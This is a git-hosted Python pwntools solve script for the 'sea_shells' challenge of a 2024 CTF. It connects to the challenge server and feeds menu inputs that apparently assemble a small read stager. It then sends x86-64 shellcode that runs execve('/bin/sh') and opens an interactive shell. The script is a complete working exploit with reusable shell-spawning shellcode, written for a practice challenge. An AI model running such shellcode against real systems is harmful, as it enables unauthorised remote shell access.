jc/ctfs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0de9ccc39460f5afb69d0867de2dda76ec6e03fa
ctfs/p3rf3ctr00t_ctf_2024/sea_shells/a.py
T
jc 031201a421 solve script
2024-11-18 19:52:31 +03:00

65 lines
1006 B
Python
Raw Blame History

#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./challenge", checksec=False)
# r = process()
r = remote("94.72.112.248", 1243)
# funcs
s = lambda a: r.sendline(a)
inc = lambda: r.sendline(b"2")
# read
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
s(b"4")
s(b"3")
s(b"5") # 89
inc()
for i in range(2): s(b"4")
for i in range(2): s(b"3")
for i in range(5): s(b"6")
s(b"5") # d6
inc()
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
for i in range(4): s(b"3")
for i in range(6): s(b"6")
s(b"5") # 31
inc()
for i in range(2): s(b"4")
for i in range(3): s(b"6")
s(b"3")
s(b"5") # d2
inc()
for i in range(2): s(b"4")
for i in range(9): s(b"6")
for i in range(2): s(b"3")
s(b"5") # b2
inc()
for i in range(17): s(b"5") # ff
inc()
s(b"5") # 0f
inc()
for i in range(2): s(b"3")
s(b"5")
for i in range(6): s(b"6") # 05
s(b"7")
# execve
sc = """
lea rdi, [rsi+35]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
s(sc)
r.interactive()
Reference in New Issue View Git Blame Copy Permalink